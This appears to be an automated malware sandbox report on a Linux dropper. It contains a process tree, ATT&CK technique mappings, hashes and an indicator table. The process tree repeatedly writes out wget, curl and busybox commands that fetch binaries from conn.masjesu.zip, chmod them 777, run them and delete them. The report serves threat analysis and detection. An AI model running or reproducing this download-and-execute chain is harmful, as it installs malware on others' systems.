- /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  ./4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - Executes dropped EXE
  PID:968
- /bin/rm
  rm 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  PID:969
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - System Network Configuration Discovery
  PID:970
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:971
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - System Network Configuration Discovery
  PID:973
- /bin/chmod
  chmod 777 DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - File and Directory Permissions Modification
  PID:974
- /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  ./DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - Executes dropped EXE
  PID:975
- /bin/rm
  rm DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  PID:976
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - System Network Configuration Discovery
  PID:977
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:978
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - System Network Configuration Discovery
  PID:980
- /bin/chmod
  chmod 777 zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - File and Directory Permissions Modification
  PID:981
- /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  ./zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - Executes dropped EXE
  PID:982
- /bin/rm
  rm zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  PID:983
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  PID:984
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:985
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - System Network Configuration Discovery
  PID:987
- /bin/chmod
  chmod 777 teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - File and Directory Permissions Modification
  PID:988
- /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  ./teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - Executes dropped EXE
  PID:989
- /bin/rm
  rm teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  PID:990
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - System Network Configuration Discovery
  PID:991
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:992
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - System Network Configuration Discovery
  PID:994
- /bin/chmod
  chmod 777 PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - File and Directory Permissions Modification
  PID:995
- /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  ./PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - Executes dropped EXE
  PID:996
- /bin/rm
  rm PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  PID:997
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  PID:998
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:999
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - System Network Configuration Discovery
  PID:1001
- /bin/chmod
  chmod 777 ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - File and Directory Permissions Modification
  PID:1002
- /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  ./ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - Executes dropped EXE
  PID:1003
- /bin/rm
  rm ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  PID:1004
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - System Network Configuration Discovery
  PID:1005
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1006
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - System Network Configuration Discovery
  PID:1008
- /bin/chmod
  chmod 777 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - File and Directory Permissions Modification
  PID:1009
- /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  ./2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - Executes dropped EXE
  PID:1010
- /bin/rm
  rm 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  PID:1011

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG	740	WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx	750	FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx	757	JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa	779	BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN	814	tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4	826	idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1	833	mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8	860	4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT	877	DQul2qKd09ITKkHJpETty8DirCA07F1nBT
/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz	884	teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx	891	PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m	898	ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS	905	2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh	912	zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1	919	mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG	926	WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx	933	FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx	940	JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa	947	BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN	954	tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4	961	idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8	968	4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT	975	DQul2qKd09ITKkHJpETty8DirCA07F1nBT
/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh	982	zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz	989	teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx	996	PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m	1003	ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS	1010	2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS